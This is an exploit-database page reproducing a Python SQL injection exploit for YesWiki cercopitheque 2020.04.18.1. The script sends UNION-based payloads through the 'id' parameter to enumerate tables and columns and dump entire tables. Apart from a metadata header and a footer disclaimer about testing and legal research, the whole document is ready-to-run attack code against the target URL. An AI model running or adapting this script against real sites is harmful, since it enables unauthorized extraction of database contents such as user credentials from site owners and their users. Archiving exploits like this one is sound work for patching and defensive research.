YesWiki cercopitheque 2020.04.18.1 id SQL Injection

CVE	Category	Price	Severity
	CWE-89	Unknown	High

Author	Risk	Exploitation Type	Date
Unknown	High	Remote	2020-05-14

CPE
cpe:cpe:/a:yeswiki:cercopitheque:2020.04.18.1

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020050124

Below is a copy:

YesWiki cercopitheque 2020.04.18.1 id SQL Injection

# Exploit Title: YesWiki cercopitheque 2020.04.18.1 - 'id' SQL Injection
# Date: 2020-04-25
# Exploit Author: coiffeur
# Vendor Homepage: https://yeswiki.net/
# Software Link: https://yeswiki.net/, https://github.com/YesWiki/yeswiki
# Version: YesWiki cercopitheque < 2020-04-18-1

import sys

import requests

DEBUG = 0


def usage():
    banner = """NAME: YesWiki cercopitheque 2020-04-18-1, SQLi
SYNOPSIS: python sqli_2020.04.18.1.py <URL> [OPTIONS]...
DESCRIPTION:
    -lt, list tables.
    -dt <TABLE>, dump table.
AUTHOR: coiffeur
    """
    print(banner)


def parse(text):
    deli_l = 'ABCAABBCC|'
    deli_r = '|ABCAABBCC'
    if (text.find(deli_l) == -1) or (text.find(deli_r) == -1):
        print('[x] Delimiter not found, please try to switch to a Time Based SQLi')
        exit(-1)
    start = text.find(deli_l) + len(deli_l)
    end = start + text[start::].find(deli_r)
    return text[start:end]


def render(elements):
    print(elements)

def get_count(t_type, table_name=None, column_name=None):
    if t_type == 'table':
        payload = '?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,count(TABLE_NAME),0x7c,0x414243414142424343) FROM information_schema.tables),NULL,NULL,NULL,NULL,NULL-- -'
        if DEBUG > 1:
            print(f'[DEBUG] {payload}')
        r = requests.get(url=f'{sys.argv[1]}{payload}')
        if r.status_code == 200:
            data = parse(r.text)
    if t_type == 'column':
        payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,count(COLUMN_NAME),0x7c,0x414243414142424343) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = "{table_name}"),NULL,NULL,NULL,NULL,NULL-- -'
        if DEBUG > 1:
            print(f'[DEBUG] {payload}')
        r = requests.get(url=f'{sys.argv[1]}{payload}')
        data = parse(r.text)
    if t_type == 'element':
        payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,count({column_name}),0x7c,0x414243414142424343) FROM {table_name}),NULL,NULL,NULL,NULL,NULL-- -'
        if DEBUG > 1:
            print(f'[DEBUG] {payload}')
        r = requests.get(url=f'{sys.argv[1]}{payload}')
        data = parse(r.text)
    return int(data)


def list_tables():
    tables_count = get_count(t_type='table')
    print(f'[+] Tables found: {tables_count}')

    tables = []
    for i in range(0, tables_count):
        payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,TABLE_NAME,0x7c,0x414243414142424343) FROM information_schema.tables LIMIT 1 OFFSET {i}),NULL,NULL,NULL,NULL,NULL-- -'
        if DEBUG > 1:
            print(f'[DEBUG] {payload}')
        r = requests.get(url=f'{sys.argv[1]}{payload}')
        if r.status_code == 200:
            talbe = parse(r.text)
            print(f'\t{talbe}')
            tables.append(talbe)
    return tables


def list_columns(table_name):
    columns_count = get_count(t_type='column', table_name=table_name)
    print(f'[+] Columns found: {columns_count}')

    columns = []
    for i in range(0, columns_count):
        payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,COLUMN_NAME,0x7c,0x414243414142424343) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = "{table_name}" LIMIT 1 OFFSET {i}),NULL,NULL,NULL,NULL,NULL-- -'
        if DEBUG > 1:
            print(f'[DEBUG] {payload}')
        r = requests.get(url=f'{sys.argv[1]}{payload}')
        if r.status_code == 200:
            column = parse(r.text)
            if DEBUG > 0:
                print(f'\t{column}')
            columns.append(column)
    return columns


def dump_table(name):
    columns = list_columns(name)
    elements = [None]*len(columns)
    for i in range(0, len(columns)):
        elements_count = get_count(
            t_type='element', table_name=name, column_name=columns[i])
        if DEBUG > 0:
            print(f'[+] Dumping: {columns[i]} ({elements_count} rows)')
        element = []
        for j in range(0, elements_count):
            payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,{columns[i]},0x7c,0x414243414142424343) FROM {name} LIMIT 1 OFFSET {j}),NULL,NULL,NULL,NULL,NULL-- -'
            if DEBUG > 1:
                print(f'[DEBUG] {payload}')
            r = requests.get(url=f'{sys.argv[1]}{payload}')
            if r.status_code == 200:
                element.append(parse(r.text))
                if DEBUG > 0:
                    print(f'\t{element[-1]}')
        elements[i] = element
    render(elements)
    return elements


def main():
    if len(sys.argv) < 3:
        print(usage())
        exit(-1)

    if sys.argv[2] == '-lt':
        list_tables()

    if sys.argv[2] == '-dt':
        dump_table(sys.argv[3])


if __name__ == "__main__":
    main()

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum